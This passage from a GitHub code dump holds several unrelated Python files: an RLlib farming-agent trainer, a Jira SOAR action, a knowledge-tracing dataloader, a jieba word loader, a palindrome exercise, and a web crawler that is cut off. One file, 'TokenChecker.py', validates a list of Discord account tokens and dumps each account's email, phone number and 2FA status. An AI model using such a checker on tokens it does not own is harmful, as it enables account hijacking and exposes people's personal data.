SampleBatch\n\nimport gymnasium as gym\nfrom gymnasium import spaces\nfrom gymnasium.wrappers.time_limit import TimeLimit\nfrom gymnasium.wrappers.record_video import RecordVideo\nfrom gymnasium.wrappers.normalize import NormalizeReward\n\n# pylint: disable=unused-import\nfrom wheatbot.farming import FarmingEnv\nfrom torch_action_mask_recurrent import TorchLSTMActionMaskModel as LSTMModel, TorchAttnActionMaskModel as AttnModel\n\nclass ParametricDictFlattenWrapper(gym.ObservationWrapper):\n '''Wrapper class that handles environments with an observation space of\n \n ```\n Dict({\n 'action_mask': Box(...),\n 'observations': Dict(...)\n })\n ```\n '''\n def __init__(self, env: gym.Env):\n super().__init__(env)\n\n self.observation_space = spaces.Dict({\n 'action_mask': env.observation_space['action_mask'],\n 'observations': spaces.flatten_space(self.env.observation_space['observations'])\n })\n\n def observation(self, obs: Dict[str, Any]):\n # pprint.pprint(obs['observations'], width=1)\n new_obs = {\n 'action_mask': obs['action_mask'],\n 'observations': spaces.flatten(self.env.observation_space['observations'], obs['observations'])\n }\n return new_obs\n\nclass Metrics(DefaultCallbacks):\n def on_episode_step(self, *, worker, base_env, policies = None, episode: Union[Episode, EpisodeV2], env_index = None, **kwargs):\n info: Dict[str, Any] = episode._last_infos['agent0']\n for k, v in info.items():\n if k.startswith('pos_') or k.endswith('_pbrs') or k.endswith('_dist'):\n episode.user_data.setdefault(k, []).append(v)\n\n def on_episode_end(self, *, worker, base_env, policies, episode: EpisodeV2, env_index, **kwargs):\n info = episode._last_infos['agent0']\n episode.custom_metrics['wheat_collected'] = info['wheat_collected']\n episode.custom_metrics['wheat_harvested'] = info['wheat_harvested']\n\n for k in episode.user_data.keys():\n if k.startswith('pos_') or k.endswith('_pbrs') or k.endswith('_dist'):\n episode.custom_metrics[k] = np.mean(episode.user_data[k])\n\n def on_postprocess_trajectory(self, *,\n worker, episode: Episode, agent_id, policy_id, policies, \n postprocessed_batch: SampleBatch, original_batches, **kwargs) -> None:\n \n actions = postprocessed_batch[SampleBatch.ACTIONS].tolist()\n episode.hist_data['actions'] = actions\n counter = Counter(actions)\n\n for i, name in enumerate(FarmingEnv.actions):\n episode.custom_metrics[f'action_{name}_selected'] = counter.get(i, 0) / len(actions)\n \n chest_idx = FarmingEnv.actions.index('interact-chest')\n episode.custom_metrics['used_chest'] = 1.0 if chest_idx in actions else 0.0\n\ndef get_cli_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--stop-iters', type=int, default=10000,\n help='Number of iterations to train')\n parser.add_argument('--stop-timesteps', type=int, default=1000000,\n help='Number of timesteps to train for')\n parser.add_argument('--stop-reward', type=float, default=1000,\n help='Reward threshold for stopping')\n parser.add_argument('--num-cpus', type=int, default=0,\n help='Number of CPUs to use')\n parser.add_argument('--local-mode', action='store_true',\n help='Start ray in local mode')\n\n args = parser.parse_args()\n return args\n\nif __name__ == '__main__':\n GAMMA = 0.99\n args = get_cli_args()\n\n def env_creator(config):\n env = FarmingEnv(config)\n env = ParametricDictFlattenWrapper(env)\n # env = TimeLimit(env, max_episode_steps=4000)\n # env = NormalizeReward(env, gamma=GAMMA)\n # env = RecordVideo(env, 'videos', episode_trigger=lambda x: x % 1000)\n\n return env\n\n ray.init(num_cpus=args.num_cpus or None, num_gpus=1, local_mode=args.local_mode)\n tune.register_env('FarmingEnv', env_creator)\n\n chest_reward = 1\n harvest_reward = (1 - GAMMA) * chest_reward\n\n config = (\n APPOConfig()\n .framework('torch')\n .environment('FarmingEnv', env_config={\n 'gamma': GAMMA,\n 'wheat_age': 7,\n 'timestep_reward': 0,\n 'fuel': 240,\n 'max_timesteps': 240,\n\n 'harvest_reward': harvest_reward,\n 'field_pbrs_type': 'r', # [1/r, gaussian, r]\n 'field_pbrs_strength': 0,\n 'field_pbrs_scale': 1,\n\n 'chest_reward': chest_reward + 0.1,\n 'chest_dist_penalty': 0,\n 'scale_chest_reward': 0,\n 'chest_pbrs_type': 'r', # [1/r, gaussian, r]\n 'chest_pbrs_strength': 0,\n 'chest_pbrs_scale': 1,\n })\n .exploration(exploration_config={\n 'type': 'EpsilonGreedy',\n 'epsilon_timesteps': 100000\n })\n .training(\n gamma=GAMMA,\n lr=1e-3,\n kl_coeff=0.1,\n clip_param=0.2,\n model={\n # 'custom_model': LSTMModel,\n # 'fcnet_hiddens': [256, 256],\n # 'fcnet_activation': 'tanh',\n # 'lstm_cell_size': 64\n\n 'custom_model': AttnModel,\n 'fcnet_hiddens': [64],\n 'fcnet_activation': 'tanh',\n 'max_seq_len': 50,\n 'attention_use_n_prev_rewards': 50,\n 'attention_use_n_prev_actions': 50,\n 'attention_num_transformer_units': 5,\n 'attention_memory_training': 50,\n 'attention_memory_inference': 50,\n 'attention_num_heads': 6,\n 'attention_head_dim': 64\n },\n train_batch_size=2000\n )\n .resources(num_gpus=int(os.environ.get(\"RLLIB_NUM_GPUS\", \"0\")))\n .rollouts(num_rollout_workers=args.num_cpus - 1)\n .callbacks(Metrics)\n )\n\n stop = {\n # \"training_iteration\": args.stop_iters,\n \"timesteps_total\": args.stop_timesteps,\n \"custom_metrics/used_chest_mean\": 0.8,\n }\n\n tuner = tune.Tuner(\n 'APPO',\n param_space=config.to_dict(),\n run_config=air.RunConfig(\n stop=stop,\n checkpoint_config=air.CheckpointConfig(\n num_to_keep=2\n )\n ),\n )\n tuner.fit()\n\n ray.shutdown()\n\n# Todo: when we copy this for hierarchal RL, rename 'prbs' to 'pbrs', and\n# update the custom metrics since each obs is now a dict with new keys, and the\n# infos are also dicts of dicts","repo_name":"jfurches/wheatbot","sub_path":"examples/farming_ppo.py","file_name":"farming_ppo.py","file_ext":"py","file_size_in_byte":7453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"7814813449","text":"import json\n\nfrom TIPCommon import extract_configuration_param, extract_action_param\n\nfrom JiraConstants import INTEGRATION_IDENTIFIER, LIST_ISSUES_SCRIPT_NAME, DEFAULT_DATE_FORMAT\nfrom JiraManager import JiraManager\nfrom ScriptResult import EXECUTION_STATE_COMPLETED, EXECUTION_STATE_FAILED\nfrom SiemplifyAction import SiemplifyAction\nfrom SiemplifyUtils import output_handler\nfrom utils import load_csv_to_list\n\nSPLIT_CHAR = \",\"\n\n\n@output_handler\ndef main():\n siemplify = SiemplifyAction()\n siemplify.script_name = LIST_ISSUES_SCRIPT_NAME\n siemplify.LOGGER.info(\"----------------- Main - Param Init -----------------\")\n\n # Integration Configuration\n api_root = extract_configuration_param(siemplify, provider_name=INTEGRATION_IDENTIFIER, param_name='Api Root', is_mandatory=True,\n print_value=True)\n username = extract_configuration_param(siemplify, provider_name=INTEGRATION_IDENTIFIER, param_name='Username', is_mandatory=True,\n print_value=True)\n api_token = extract_configuration_param(siemplify, provider_name=INTEGRATION_IDENTIFIER, param_name='Api Token', is_mandatory=True,\n print_value=False)\n verify_ssl = extract_configuration_param(siemplify, provider_name=INTEGRATION_IDENTIFIER, param_name='Verify SSL',\n default_value=False, input_type=bool)\n # Action parameters\n summary = extract_action_param(siemplify, param_name=\"Summary\", is_mandatory=False, print_value=True)\n description = extract_action_param(siemplify, param_name=\"Description\", is_mandatory=False, print_value=True)\n reporter = extract_action_param(siemplify, param_name=\"Reporter\", is_mandatory=False, print_value=True)\n updated_from = extract_action_param(siemplify, param_name=\"Updated From\", default_value=DEFAULT_DATE_FORMAT, is_mandatory=False,\n print_value=True)\n created_from = extract_action_param(siemplify, param_name=\"Created From\", default_value=DEFAULT_DATE_FORMAT, is_mandatory=False,\n print_value=True)\n project_names = extract_action_param(siemplify, param_name=\"Project Names\", is_mandatory=False, print_value=True)\n issue_types = extract_action_param(siemplify, param_name=\"Issue Types\", is_mandatory=False, print_value=True)\n priorities = extract_action_param(siemplify, param_name=\"Priorities\", is_mandatory=False, print_value=True)\n assignees = extract_action_param(siemplify, param_name=\"Assignees\", is_mandatory=False, print_value=True)\n statuses = extract_action_param(siemplify, param_name=\"Statuses\", is_mandatory=False, print_value=True)\n\n siemplify.LOGGER.info(\"----------------- Main - Started -----------------\")\n status = EXECUTION_STATE_COMPLETED\n\n try:\n jira = JiraManager(api_root, username, api_token, verify_ssl=verify_ssl, logger=siemplify.LOGGER)\n\n project_names_list = load_csv_to_list(project_names, \"Project Names\") if project_names else None\n issue_types_list = load_csv_to_list(issue_types, \"Issue Types\") if issue_types else None\n priority_list = load_csv_to_list(priorities, \"Priorities\") if priorities else None\n assignee_list = load_csv_to_list(assignees, \"Assignees\") if assignees else None\n status_list = load_csv_to_list(statuses, \"Statuses\") if statuses else None\n\n siemplify.LOGGER.info(f\"Fetching issues with provided filter parameters\")\n issues_keys = jira.list_issues(project_key_list=project_names_list,\n assignee_list=assignee_list,\n issue_type_list=issue_types_list,\n priority_list=priority_list,\n status_list=status_list,\n summary=summary,\n description=description,\n reporter=reporter,\n created_from=created_from if created_from != DEFAULT_DATE_FORMAT else None,\n updated_from=updated_from if updated_from != DEFAULT_DATE_FORMAT else None)\n\n siemplify.LOGGER.info(f\"Successfully fetched {len(issues_keys)} issues\")\n\n if issues_keys:\n output_message = f\"Found {len(issues_keys)} issues: {', '.join(issues_keys)}.\"\n result_value = json.dumps(issues_keys)\n siemplify.result.add_result_json(json.dumps(issues_keys))\n else:\n output_message = \"No issues were found for the provided filter parameters.\"\n result_value = False\n\n except Exception as error:\n output_message = \"Failed to list issues. Error is: {}\".format(error)\n result_value = False\n status = EXECUTION_STATE_FAILED\n siemplify.LOGGER.error(output_message)\n siemplify.LOGGER.exception(error)\n\n siemplify.LOGGER.info('----------------- Main - Finished -----------------')\n siemplify.LOGGER.info(f\"Status: {status}\")\n siemplify.LOGGER.info(f\"Result Value: {result_value}\")\n siemplify.LOGGER.info(f\"Output Message: {output_message}\")\n siemplify.end(output_message, result_value, status)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"chronicle/tip-marketplace","sub_path":"Integrations/Jira/ActionsScripts/ListIssues.py","file_name":"ListIssues.py","file_ext":"py","file_size_in_byte":5359,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"20"} +{"seq_id":"1629494790","text":"import requests\r\nimport pystyle\r\nfrom pystyle import *\r\nimport platform\r\nimport sys\r\nimport time\r\nimport datetime\r\nSystem.Clear()\r\nascii = '''\r\n\r\n██████╗░███████╗░█████╗░████████╗██╗░░██╗\r\n██╔══██╗██╔════╝██╔══██╗╚══██╔══╝██║░░██║\r\n██║░░██║█████╗░░███████║░░░██║░░░███████║\r\n██║░░██║██╔══╝░░██╔══██║░░░██║░░░██╔══██║\r\n██████╔╝███████╗██║░░██║░░░██║░░░██║░░██║\r\n╚═════╝░╚══════╝╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░╚═╝'''[1:]\r\n\r\nprint(Colorate.Horizontal(Colors.blue_to_cyan, Center.XCenter(ascii)))\r\n\r\ndef set_terminal_title(title):\r\n if platform.system() == 'Windows':\r\n sys.stdout.write(\"\\033]0;{}\\007\".format(title))\r\n else:\r\n sys.stdout.write(\"\\033]2;{}\\007\".format(title))\r\n sys.stdout.flush()\r\n\r\nfriends_count = ''\r\n\r\ndef tokenInfo(token):\r\n headr1 = {\r\n 'Authorization': f'{token}',\r\n 'Content-Type': 'application/json'\r\n }\r\n res = requests.get('https://discordapp.com/api/v6/users/@me', headers=headr1)\r\n if res.status_code == 200:\r\n print(f\"Valid Token[collecting data...]\")\r\n pass\r\n else:\r\n print(f\"Invalid Token!\")\r\n\r\n res_json = res.json()\r\n user = f'{res_json[\"username\"]}#{res_json[\"discriminator\"]}'\r\n uid = res_json['id']\r\n user_id = uid\r\n avatar_id = res_json['avatar']\r\n avatar_url = f'https://cdn.discordapp.com/avatars/{user_id}/{avatar_id}.gif'\r\n pnum = res_json['phone']\r\n email = res_json['email']\r\n mfa_enabled = res_json['mfa_enabled']\r\n flags = res_json['flags']\r\n lang = res_json['locale']\r\n verified = res_json['verified']\r\n has_nitro = False\r\n res = requests.get('https://discordapp.com/api/v6/users/@me/billing/subscriptions', headers=headr1)\r\n nitro_data = res.json()\r\n has_nitro = bool(len(nitro_data) > 0)\r\n\r\n print( f\"\"\"\\n\r\n Token: {token}\r\nUsername: {user}\r\nUser-ID: {uid}\r\nAvatar-ID: {avatar_id}\r\nAvatar-URL: {avatar_url}\r\nPhone-Number: {pnum}\r\nEmail: {email}\r\n2FA: {mfa_enabled}\r\nFlags: {flags}\r\nLanguage: {lang}\r\nVerified: {verified}\r\nNitro: {has_nitro}\r\n\"\"\")\r\nwith open(\"tokens.txt\", \"r\") as file:\r\n tokens = [line.replace('\\n', '') for line in file.readlines() if line != '\\n']\r\n valid_tokens = []\r\n invalid_tokens = []\r\n for token in tokens:\r\n r1 = requests.get('https://discord.com/api/v6/auth/login', headers={\"Authorization\": token})\r\n if r1.status_code <= 299:\r\n print(Colorate.Horizontal(Colors.blue_to_cyan, f\"Valid token | {token}\"))\r\n print(Colorate.Horizontal(Colors.blue_to_cyan,'------------------------------------------------------------------------------------------------------------'))\r\n set_terminal_title(\"Valid tokens = {} Invalid tokens = {}\".format(len(valid_tokens), len(invalid_tokens)))\r\n valid_tokens.append(token)\r\n else:\r\n print(Colorate.Horizontal(Colors.blue_to_white, f\"Invalid token | {token}\"))\r\n print(Colorate.Horizontal(Colors.blue_to_cyan,'------------------------------------------------------------------------------------------------------------'))\r\n set_terminal_title(\"Valid tokens = {} Invalid tokens = {}\".format(len(valid_tokens), len(invalid_tokens)))\r\n invalid_tokens.append(token)\r\n\r\nwith open(\"valid_tokens.txt\", \"w\") as valid_file:\r\n for token in valid_tokens:\r\n valid_file.write(token + \"\\n\")\r\n\r\nwith open(\"invalid_tokens.txt\", \"w\") as invalid_file:\r\n for token in invalid_tokens:\r\n invalid_file.write(token + \"\\n\")\r\n\r\n\r\nchoice = input(Colorate.Horizontal(Colors.blue_to_cyan,'Do you want tokens informations ? Yes [1] / No [2]'))\r\nif choice == '1':\r\n\r\n with open(\"valid_tokens.txt\", \"r\") as file:\r\n tokens = [line.replace('\\n', '') for line in file.readlines() if line != '\\n']\r\n for token in tokens:\r\n tokenInfo(token)\r\n\r\nelse:\r\n print('')\r\n\r\n\r\ninput(Colorate.Horizontal(Colors.blue_to_cyan, 'Working token saved in valid_tokens.txt \\n\\nInvalid token are saved in invalid_token \\n\\nPress any key to leave'))\r\nSystem.Clear()\r\n","repo_name":"TheCuteOwl/Death-Multitools","sub_path":"Utils/TokenChecker.py","file_name":"TokenChecker.py","file_ext":"py","file_size_in_byte":4498,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"71744586291","text":"import os\nos.chdir(\"../../\")\nfrom evaluator import Evaluator\n\n\nif __name__ == \"__main__\":\n configs = []\n for property in [\"phc\",\"phh\",\"ec\",\"caco3\",\"p\",\"n\",\"k\"]:\n configs.append({\"x\":[property], \"y\":\"oc\", \"machine\":\"ann\"})\n\n ev = Evaluator(\n cofigs=configs,\n repeat=1,\n folds=10,\n prefix=\"all_ann_single\"\n )\n ev.process()\n print(\"Done all\")","repo_name":"arf-themascoteers/visnir","sub_path":"cases/archived/all_ann_single.py","file_name":"all_ann_single.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"71013595889","text":"string = input()\narr = [0] * 100\nfor s in string:\n arr[ord(s)] += 1\nN = sum(arr)\nflag = []\nfor i in range(100):\n if arr[i] % 2:\n flag.append([i,arr[i]])\nif (N%2 and len(flag) != 1) or (not N%2 and len(flag) > 0):\n print('I\\'m Sorry Hansoo')\nelse:\n ans = ''\n for i in range(100):\n if arr[i]:\n temp = arr[i]//2\n arr[i] -= temp\n ans += chr(i)*temp\n\n if flag:\n ans += chr(flag[0][0])\n arr[flag[0][0]] -= 1\n\n for i in range(99,-1,-1):\n if arr[i]:\n ans += chr(i)*arr[i]\n print(ans)","repo_name":"hw2ny1/STUDY","sub_path":"Boj/Silver/1213 펠린���롬 만들기.py","file_name":"1213 펠린드롬 만들기.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"26661384026","text":"# Multi-word nouns are in a different file so we can\n# read the entire line\ndef get_multi_nouns():\n\twith open(\"gram-mult-noun\", \"w\") as output:\n\t\twith open(\"mult-noun-def\",\"r\") as input:\n\t\t\tfor line in input:\n\t\t\t\toutput.write(\" | \" + line.rstrip())\n\t\tinput.closed\n\toutput.closed\n\n# Get all of the words labels with [label] for easy \n# exporting to the grammar\ndef get_labels(label):\n\twith open(\"gram-out\", \"w\") as output:\n\t\twith open(\"gram-def\",\"r\") as input:\n\t\t\tfor line in input:\n\t\t\t\ttokens = line.split()\n\t\t\t\tif tokens[1].upper() == label:\n\t\t\t\t\toutput.write(\" | \" + tokens[0])\n\t\tinput.closed\n\toutput.closed\n\nget_labels(\"NOUN\")\nget_multi_nouns()","repo_name":"tranac/cs544-group-project","sub_path":"eval/generate_grammar.py","file_name":"generate_grammar.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"70578874610","text":"import numpy as np\nimport torch\nfrom sklearn.model_selection import train_test_split\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.dataloader import default_collate\nfrom torch.utils.data import TensorDataset\nimport more_itertools as miter\n\nclass TAMKOT_DataLoader:\n def __init__(self, config, data):\n self.batch_size = config[\"batch_size\"]\n self.shuffle = config[\"shuffle\"]\n self.collate_fn = default_collate\n self.metric = config[\"metric\"]\n\n self.seed = config['seed']\n\n self.validation_split = config[\"validation_split\"]\n self.mode = config[\"mode\"]\n\n self.min_seq_len = config[\"min_seq_len\"] if \"min_seq_len\" in config else None\n self.max_seq_len = config[\"max_seq_len\"] if \"max_seq_len\" in config else None\n self.stride = config[\"max_seq_len\"] if \"max_seq_len\" in config else None\n\n self.init_kwargs = {\n 'batch_size': self.batch_size,\n 'shuffle': self.shuffle,\n 'collate_fn': self.collate_fn,\n }\n\n self.generate_train_test_data(data)\n\n # define the data format for different perfromance data\n if self.metric == 'rmse':\n self.train_data = TensorDataset(torch.Tensor(self.train_data_q).long(),\n torch.Tensor(self.train_data_a).float(),\n torch.Tensor(self.train_data_l).long(),\n torch.Tensor(self.train_data_d).long(),\n torch.Tensor(self.train_target_answers).float(),\n torch.Tensor(self.train_target_masks).bool(),\n torch.Tensor(self.train_target_masks_l).bool())\n\n self.test_data = TensorDataset(torch.Tensor(self.test_data_q).long(), torch.Tensor(self.test_data_a).float(),\n torch.Tensor(self.test_data_l).long(), torch.Tensor(self.test_data_d).long(),\n torch.Tensor(self.test_target_answers).float(),\n torch.Tensor(self.test_target_masks).bool(),\n torch.Tensor(self.test_target_masks_l).bool())\n\n else:\n self.train_data = TensorDataset(torch.Tensor(self.train_data_q).long(),\n torch.Tensor(self.train_data_a).long(),\n torch.Tensor(self.train_data_l).long(),\n torch.Tensor(self.train_data_d).long(),\n torch.Tensor(self.train_target_answers).long(),\n torch.Tensor(self.train_target_masks).bool(),\n torch.Tensor(self.train_target_masks_l).bool())\n\n\n self.test_data = TensorDataset(torch.Tensor(self.test_data_q).long(), torch.Tensor(self.test_data_a).long(),\n torch.Tensor(self.test_data_l).long(), torch.Tensor(self.test_data_d).long(),\n torch.Tensor(self.test_target_answers).long(),\n torch.Tensor(self.test_target_masks).bool(),\n torch.Tensor(self.test_target_masks_l).bool())\n\n # create batched data\n self.train_loader = DataLoader(self.train_data, batch_size=self.batch_size)\n\n self.test_loader = DataLoader(self.test_data, batch_size=self.test_data_a.shape[0])\n\n\n def generate_train_test_data(self, data):\n \"\"\"\n read or process data for training and testing\n \"\"\"\n\n q_records = data[\"traindata\"][\"q_data\"]\n a_records = data[\"traindata\"][\"a_data\"]\n l_records = data[\"traindata\"][\"l_data\"]\n d_records = data[\"traindata\"][\"d_data\"]\n\n self.train_data_q, self.train_data_a, self.train_data_l, self.train_data_d = self.TAMKOT_ExtDataset(q_records,\n a_records,\n l_records,\n d_records,\n self.max_seq_len,\n stride=self.stride)\n\n self.train_target_answers = np.copy(self.train_data_a)\n self.train_target_masks = (self.train_data_q != 0)\n self.train_target_masks_l = (self.train_data_l != 0)\n\n if self.mode == \"train\":\n # n_samples = len(self.train_data_q)\n # split the train data into train and val sets based on the self.n_samples\n\n self.train_data_q, self.test_data_q, self.train_data_a, self.test_data_a, self.train_data_l, \\\n self.test_data_l, self.train_data_d, \\\n self.test_data_d, self.train_target_answers, self.test_target_answers, \\\n self.train_target_masks, self.test_target_masks, self.train_target_masks_l, self.test_target_masks_l = train_test_split(\n self.train_data_q, self.train_data_a, self.train_data_l, self.train_data_d, self.train_target_answers,\n self.train_target_masks, self.train_target_masks_l)\n\n\n elif self.mode == 'test':\n q_records = data[\"testdata\"][\"q_data\"]\n a_records = data[\"testdata\"][\"a_data\"]\n l_records = data[\"testdata\"][\"l_data\"]\n d_records = data[\"testdata\"][\"d_data\"]\n\n\n self.test_data_q, self.test_data_a, self.test_data_l, self.test_data_d = self.TAMKOT_ExtDataset(q_records,\n a_records,\n l_records,\n d_records,\n self.max_seq_len,\n stride=self.stride)\n\n self.test_target_answers = np.copy(self.test_data_a)\n self.test_target_masks = (self.test_data_q != 0)\n self.test_target_masks_l = (self.test_data_l != 0)\n\n\n\n def TAMKOT_ExtDataset(self, q_records, a_records, l_records, d_records,\n max_seq_len,\n stride):\n \"\"\"\n transform the data into feasible input of model,\n truncate the seq. if it is too long and\n pad the seq. with 0s if it is too short\n \"\"\"\n\n q_data = []\n a_data = []\n l_data = []\n d_data = []\n for index in range(len(q_records)):\n q_list = q_records[index]\n a_list = a_records[index]\n l_list = l_records[index]\n d_list = d_records[index]\n\n # if seq length is less than max_seq_len, the windowed will pad it with fillvalue\n # the reason for inserting two padding attempts with 0 and setting stride = stride - 2 is to make sure the\n # first activity of each sequence is included in training and testing, and also for each sequence's first\n # activity there is an activity zero to be t - 1 attempt.\n\n q_list.insert(0, 0)\n a_list.insert(0, 2)\n l_list.insert(0, 0)\n d_list.insert(0, 0)\n\n q_list.insert(0, 0)\n a_list.insert(0, 2)\n l_list.insert(0, 0)\n d_list.insert(0, 0)\n q_patches = list(miter.windowed(q_list, max_seq_len, fillvalue=0, step=stride-2))\n a_patches = list(miter.windowed(a_list, max_seq_len, fillvalue=2, step=stride-2))\n l_patches = list(miter.windowed(l_list, max_seq_len, fillvalue=0, step=stride-2))\n d_patches = list(miter.windowed(d_list, max_seq_len, fillvalue=0, step=stride-2))\n\n q_data.extend(q_patches)\n a_data.extend(a_patches)\n l_data.extend(l_patches)\n d_data.extend(d_patches)\n\n return np.array(q_data), np.array(a_data), np.array(l_data), np.array(d_data)\n\n\n\n","repo_name":"persai-lab/BigData2022-TAMKOT","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":8663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"5092904672","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/7/29 17:19\n# @Author : jimmy\n# @File : UserProfileWordLibrary.py\n# @Software: PyCharm\nimport threading\nimport os\nimport jieba\nimport jieba.posseg as pesg\n\n# 用户画像词库\nclass UserprofileWordLibrary(object):\n _instance_lock = threading.Lock()\n\n def __init__(self, wordLibrary_path_list):\n self.wordLibrary_path_list = wordLibrary_path_list\n # 加载停用词\n self.stop_words = self.readDataFromTxtFile(inputPath=self.wordLibrary_path_list[0], dataTpye='set')\n # 加载词库\n self.word_library = {}\n for index in range(1, len(wordLibrary_path_list)):\n word_library_name = os.path.basename(wordLibrary_path_list[index]).replace('.txt', '')\n word_library_value = self.readDataFromTxtFile(inputPath=self.wordLibrary_path_list[index], dataTpye='set')\n if word_library_value != -1:\n self.word_library[word_library_name] = word_library_value\n jieba.load_userdict(wordLibrary_path_list[index])\n self.pesg = pesg\n\n @classmethod\n def instance(cls, *args, **kwargs):\n if not hasattr(UserprofileWordLibrary, \"_instance\"):\n with UserprofileWordLibrary._instance_lock:\n if not hasattr(UserprofileWordLibrary, \"_instance\"):\n UserprofileWordLibrary._instance = UserprofileWordLibrary(*args, **kwargs)\n return UserprofileWordLibrary._instance\n\n # 读Txt文件内内容\n def readDataFromTxtFile(self, inputPath, dataTpye='List'):\n try:\n with open(inputPath, 'r', encoding='utf-8') as f:\n text = f.read()\n f.close()\n textList = text.split('\\n')\n textList = list(filter(None, textList))\n if dataTpye.lower() == 'list':\n return textList\n elif dataTpye.lower() == 'set':\n return set(textList)\n else:\n return -1\n except:\n return -1","repo_name":"JimmyLong/python-getkeyword-demo","sub_path":"DataScienceServer_GetKeyWords/UserProfileWordLibrary.py","file_name":"UserProfileWordLibrary.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"21802985789","text":"\"\"\"\r\nThis is a webCrawler designed for extracting urls. It will filter the desired urls to prevent\r\nduplicated crawls in the future. Final urls will be saved in txt file.\r\n\"\"\"\r\n\r\nimport bs4 as bs\r\nimport urllib.request\r\nimport urllib.error\r\nimport re\r\nimport codecs\r\nimport time\r\nimport socket\r\nimport threading\r\nimport queue as Queue\r\nimport urllib3\r\n\r\n\r\n\r\ndef html_to_bs(start_url):\r\n \"\"\"\r\n Convert website html to Beautiful Soup.\r\n :param start_url: start url for crawling\r\n :return beautiful soup object\r\n \"\"\"\r\n sauce = urllib.request.urlopen(start_url).read()\r\n soup = bs.BeautifulSoup(sauce, 'lxml')\r\n return soup\r\n\r\n\r\ndef url_finder(soup, start_url, module_pattern, exist_url):\r\n \"\"\"\r\n Find all the url links from start url.\r\n :param soup: bs by start url\r\n start_url: start url for crawling\r\n module_pattern: the url pattern of assigned module\r\n :return: spider_lst : a list contains all urls in website\r\n \"\"\"\r\n spider_list = [] + exist_url\r\n # spider_list.append(start_url)\r\n\r\n http_scan = re.compile('http')\r\n module_scan = re.compile(module_pattern)\r\n # http_full_html = \"https://www.cnn.com\"\r\n http_full_html = \"https://www.dailymail.co.uk\"\r\n\r\n tmp_url_list = soup.find_all('a')\r\n for link in tmp_url_list:\r\n new_url = link.get('href')\r\n full_url_flag = re.findall(http_scan, str(new_url))\r\n module_url_flag = re.findall(module_scan, str(new_url))\r\n\r\n # check url module\r\n if len(module_url_flag) > 0:\r\n # Adding url with full format to list\r\n if len(full_url_flag) > 0:\r\n if new_url not in spider_list:\r\n spider_list.append(new_url)\r\n # Complementing url lacking http format\r\n else:\r\n new_url = http_full_html + str(new_url)\r\n if new_url not in spider_list:\r\n spider_list.append(new_url)\r\n else:\r\n pass\r\n\r\n return spider_list\r\n\r\n\r\ndef url_fill(spider_list, max_url_num, module_pattern):\r\n \"\"\"\r\n Fill url list base on current urls.\r\n :param spider_list: urls obtained from start url\r\n :return: scape_list which contain max number url\r\n \"\"\"\r\n scrape_list = [] + spider_list\r\n\r\n for url in spider_list:\r\n crawler_url = url\r\n\r\n try:\r\n timeout = 20\r\n socket.setdefaulttimeout(timeout)\r\n sleep_download_time = 10\r\n time.sleep(sleep_download_time)\r\n\r\n sauce = urllib.request.urlopen(crawler_url).read()\r\n soup = bs.BeautifulSoup(sauce, 'lxml')\r\n except (urllib.error.URLError, urllib.error.HTTPError, socket.timeout, AttributeError):\r\n print(\"Soup convert failed from: \", url)\r\n continue\r\n\r\n try:\r\n new_url_list = url_finder(soup, crawler_url, module_pattern, scrape_list)\r\n except Exception as e:\r\n print(\"Url find fail: \" + url)\r\n print(str(e))\r\n\r\n scrape_list = new_url_list + scrape_list\r\n spider_list += new_url_list\r\n\r\n print(len(scrape_list))\r\n if len(scrape_list) >= max_url_num:\r\n break\r\n\r\n return scrape_list\r\n\r\n\r\ndef url_save(scrape_list, save_path):\r\n file = codecs.open(save_path, 'a')\r\n for url in scrape_list:\r\n file.write(str(url) + \"\\n\")\r\n\r\n\r\ndef url_filter(url, lock, save_file_path):\r\n\r\n try:\r\n print(url)\r\n timeout = 50\r\n socket.setdefaulttimeout(timeout)\r\n sleep_download_time = 10\r\n time.sleep(sleep_download_time)\r\n\r\n # context = ssl._create_unverified_context()\r\n request = urllib.request.urlopen(url)\r\n sauce = request.read()\r\n request.close()\r\n except (urllib.error.URLError, urllib.error.HTTPError, socket.timeout) as e:\r\n print('URL Error!', url)\r\n print(e)\r\n return\r\n\r\n soup = bs.BeautifulSoup(sauce, 'lxml')\r\n\r\n # check highlight\r\n highlight = soup.select('.el__storyhighlights__item')\r\n if len(highlight) == 0: # there is no highlight in website\r\n return\r\n\r\n # check video\r\n video = soup.select('.el__video')\r\n if len(video) == 0: # there is no video in website\r\n return\r\n\r\n lock.acquire()\r\n save_file = codecs.open(save_file_path, 'a')\r\n save_file.write(str(url) + \"\\n\")\r\n save_file.close()\r\n lock.release()\r\n\r\n# def url_lead(url_file_path):\r\n# \"\"\"\r\n# read in url list, which is already crawled\r\n# :param url_file_path:\r\n# :return:\r\n# \"\"\"\r\n# file = codecs.open(url_file_path).read().split(\"\\n\")\r\n# scrape_list = []\r\n# for url in file:\r\n# scrape_list.append(url)\r\n# return scrape_list\r\n\r\ndef assign_filter(url_queue, lock, save_path):\r\n \"\"\"\r\n assign filter task for every thread\r\n :param url_queue: a queue contains all urls\r\n :param lock: lock in thread for using one global variation\r\n :param save_path: save scrapping contents\r\n :return:\r\n \"\"\"\r\n # save_file = codecs.open(save_path, 'a', encoding='utf-8')\r\n while not exitFlag:\r\n if not url_queue.empty():\r\n url = url_queue.get()\r\n url_filter(url, lock, save_path)\r\n\r\n\r\ndef 